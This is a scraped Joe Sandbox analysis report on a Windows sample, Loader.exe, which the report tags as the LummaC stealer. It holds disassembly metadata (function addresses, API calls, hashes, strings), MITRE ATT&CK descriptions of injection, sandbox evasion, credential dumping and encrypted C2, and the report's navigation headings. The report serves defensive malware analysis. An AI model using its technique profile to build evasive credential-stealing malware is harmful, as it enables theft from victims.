Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 50db343071c7fc3c48a0a066a4e5ade8fa50e5af813dafb6a49baa4af7468404
Instruction ID: d94a48af51fb2dcc5e2f3c9d4955b1ddf7624fe5f50f9c613b67ffc49b3fc1e6
Opcode Fuzzy Hash: 50db343071c7fc3c48a0a066a4e5ade8fa50e5af813dafb6a49baa4af7468404
Instruction Fuzzy Hash: 6BF0A536604529BBDF226FD5DC08A9A7F66FF587B2B044013FA1996120DB328861AB91

Function 00A704F5 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00A70507
GetCurrentThreadId.KERNEL32 ref: 00A70516
GetCurrentProcessId.KERNEL32 ref: 00A7051F
QueryPerformanceCounter.KERNEL32(?), ref: 00A7052C

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 5f9371ace77956c688fff65c05458b9a6b9de34c1106a434ea9f81869c924124
Instruction ID: 8469ece2d0871438aa6edb57d630cdbd0dadf4673bc1d9f1ba49452bfe42fd1f
Opcode Fuzzy Hash: 5f9371ace77956c688fff65c05458b9a6b9de34c1106a434ea9f81869c924124
Instruction Fuzzy Hash: 38F05F74E1020DEBCB00DBF5DA4999EBBF4FF1C200B914996A412E6110EA30AA45DB50

Function 00A80976 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A7C16A: GetLastError.KERNEL32(00000000,?,00A7E58D), ref: 00A7C16E
Part of subcall function 00A7C16A: SetLastError.KERNEL32(00000000,?,?,00000028,00A78363), ref: 00A7C210

GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00A75BD5,?,?,?,00000055,?,-00000050,?,?,?), ref: 00A80A35
IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00A75BD5,?,?,?,00000055,?,-00000050,?,?), ref: 00A80A6C

Strings

utf8, xrefs: 00A80B3E

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: ErrorLast$CodePageValid
String ID: utf8
API String ID: 943130320-905460609
Opcode ID: 83488d0207aea6c0acdd52cd82e8567e7265b057c1895c1eb0027fd19d2792f3
Instruction ID: c5c65cec8a08501ec86d1d760e3931a4b1265349abe8ce7d1aaf1c95ba1446d4
Opcode Fuzzy Hash: 83488d0207aea6c0acdd52cd82e8567e7265b057c1895c1eb0027fd19d2792f3
Instruction Fuzzy Hash: D4513771B00705AADB69BB74CD86FBBB3A8EF05744F044429F55A97082FB70ED4887A1

Function 00A673E0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Concurrency::details::_Release_chore.LIBCPMT ref: 00A67526
___std_exception_copy.LIBVCRUNTIME ref: 00A67561

Part of subcall function 00A6AF37: CreateThreadpoolWork.KERNEL32(00A6B060,00A68A2A,00000000), ref: 00A6AF46
Part of subcall function 00A6AF37: Concurrency::details::_Reschedule_chore.LIBCPMT ref: 00A6AF53

Strings

Fail to schedule the chore!, xrefs: 00A67551, 00A67560

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: Concurrency::details::_$CreateRelease_choreReschedule_choreThreadpoolWork___std_exception_copy
String ID: Fail to schedule the chore!
API String ID: 3683891980-3313369819
Opcode ID: 32e74f2deeb70f2926663d905820ed052dfd025e0a99b1ca28521aa8fa816879
Instruction ID: 02a0198b4016e901bf496ac898986edc6286690ee001938c909b39217255fe68
Opcode Fuzzy Hash: 32e74f2deeb70f2926663d905820ed052dfd025e0a99b1ca28521aa8fa816879
Instruction Fuzzy Hash: F9519EB4A10218DFCF00DF94D948BAEBBB1FF08324F144129E81AAB391DB75A905CF91

Function 00A7B992 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 120COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00A7B893,?,?,00000000,00000000,00000000,?), ref: 00A7B9B7

Strings

RCC, xrefs: 00A7B9D1
MOC, xrefs: 00A7B9C9

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 98042c4d0a6a099a3bc8f5ad181ad9ce4a4796c1cac9fb672dc112b4dee0acf8
Instruction ID: d88288f33cc8fd44ce8738fca6342a4bbaeeb11bfe704af8befc82f9ce09302a
Opcode Fuzzy Hash: 98042c4d0a6a099a3bc8f5ad181ad9ce4a4796c1cac9fb672dc112b4dee0acf8
Instruction Fuzzy Hash: F94148B2900209EFCF16DF98CD81AAEBBB5BF48340F18C199FA18A7211D3359950DB61

Function 00A63E90 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00A63EC6
std::_Lockit::~_Lockit.LIBCPMT ref: 00A64002

Part of subcall function 00A6ABC5: _Yarn.LIBCPMT ref: 00A6ABE5
Part of subcall function 00A6ABC5: _Yarn.LIBCPMT ref: 00A6AC09

Strings

bad locale name, xrefs: 00A63F46

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: LockitYarnstd::_$Lockit::_Lockit::~_
String ID: bad locale name
API String ID: 2070049627-1405518554
Opcode ID: b1c63ae8f290af117b16d9d1fc086f2e9bd2224b73023d0969e48b984c365305
Instruction ID: 2b77fc916c62b8e3ff9a9f8a59e32dc08e450454c8de153ef27cc4d4fbca1c6d
Opcode Fuzzy Hash: b1c63ae8f290af117b16d9d1fc086f2e9bd2224b73023d0969e48b984c365305
Instruction Fuzzy Hash: 9E418FF1A007459BEB10EF69C905B57BBF8BF04714F044629E4099B781E77AE518CBE1

Function 00A7B1FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00A7B475

Strings

csm, xrefs: 00A7B508
csm, xrefs: 00A7B497

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: 63dc5954610c977c7637b053f87e59a7b947ba425931f4115fd3143ee7f7fbe0
Instruction ID: 5270dfc370027a0edac5da0e28ae1d9c1221e64e692c9fed6932fee5d586a612
Opcode Fuzzy Hash: 63dc5954610c977c7637b053f87e59a7b947ba425931f4115fd3143ee7f7fbe0
Instruction Fuzzy Hash: 4F3107F2420219EBCF228F51CC44AAA7B76FF08718B18C65AF84D49122C332DD61DBA1

Function 00A6B831 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00A6B8B9
RaiseException.KERNEL32(?,?,?,?,?), ref: 00A6B8DE

Part of subcall function 00A7060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,00A6F354,00000000,?,?,?,00A6F354,00A63D4A,00A9759C,00A63D4A), ref: 00A7066D

Part of subcall function 00A78353: IsProcessorFeaturePresent.KERNEL32(00000017,00A7378B,?,?,?,?,00000000,?,?,?,00A6B5AC,00A6B4E0,00000000,?,?,00A6B4E0), ref: 00A7836F

Strings

csm, xrefs: 00A6B86D

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
String ID: csm
API String ID: 1924019822-1018135373
Opcode ID: 6d11153da41881c63f3e543594392f4bb5736519afa37799bcd45869cec2c79b
Instruction ID: a0c841d329b6cf57befff0513035183101fbeae13c8d1e6c2652ffeb3931e870
Opcode Fuzzy Hash: 6d11153da41881c63f3e543594392f4bb5736519afa37799bcd45869cec2c79b
Instruction Fuzzy Hash: 1E21AC31E10218EBCF34EF99D945AEEB7BCAF40710F144419E506EB250CB70AD85CBA1

Function 00A6B46C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00A62673

Strings

ios_base::badbit set, xrefs: 00A62650
bad array new length, xrefs: 00A62626

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: ___std_exception_copy
String ID: bad array new length$ios_base::badbit set
API String ID: 2659868963-1158432155
Opcode ID: 143b623ce8dd4fc44d5d888def5996d9dee2419bdc227b1989af70e5c55c4ebf
Instruction ID: eb1d3eddb6a26f4e1fdb884c3f7256f063db4edbc3dc734d24ca8c7d07bd4f22
Opcode Fuzzy Hash: 143b623ce8dd4fc44d5d888def5996d9dee2419bdc227b1989af70e5c55c4ebf
Instruction Fuzzy Hash: E601BCB1614300ABDB04EF28D856A1A7BF4AF08318F01882DF45D9B341E775E804CB91

Function 00A62610 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A7060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,00A6F354,00000000,?,?,?,00A6F354,00A63D4A,00A9759C,00A63D4A), ref: 00A7066D

___std_exception_copy.LIBVCRUNTIME ref: 00A62673

Strings

ios_base::badbit set, xrefs: 00A62650
bad array new length, xrefs: 00A62626

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: bad array new length$ios_base::badbit set
API String ID: 3109751735-1158432155
Opcode ID: fb4a3dcc6ae9f260a011df3fd74b16d871091adf93b3cd61472f9f8c26350b46
Instruction ID: 5828b73985da4892474a2de5ce16a56f2e60418cf8dc1164ecf5716b6fe3a1f9
Opcode Fuzzy Hash: fb4a3dcc6ae9f260a011df3fd74b16d871091adf93b3cd61472f9f8c26350b46
Instruction Fuzzy Hash: 6FF0D4F1614300ABD700AF18DD49B4BBBF4AB48718F018C1DF5999B340D3B5E444CB92

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Loader.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Windows Analysis Report
Loader.exe

Function 00A9A19E Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 295
threadinjectionmemoryCOMMON

Function 00A61FB0 Relevance: 9.2, APIs: 6, Instructions: 200
fileCOMMON

Function 00A624B0 Relevance: 10.6, APIs: 7, Instructions: 83
threadCOMMON

Function 00A7CF0B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Function 00A61750 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 390
COMMON

Function 00A75349 Relevance: 4.6, APIs: 3, Instructions: 51
threadCOMMON

Function 00A754EE Relevance: 4.5, APIs: 3, Instructions: 30
threadCOMMON

Function 00A7565F Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Function 00A83BF4 Relevance: 3.2, APIs: 2, Instructions: 196
fileCOMMONLIBRARYCODE

Function 00A843CD Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Function 00A690F0 Relevance: 3.1, APIs: 2, Instructions: 73
COMMON

Function 00A7DA52 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Function 00A61EF0 Relevance: 3.1, APIs: 2, Instructions: 60
memoryCOMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre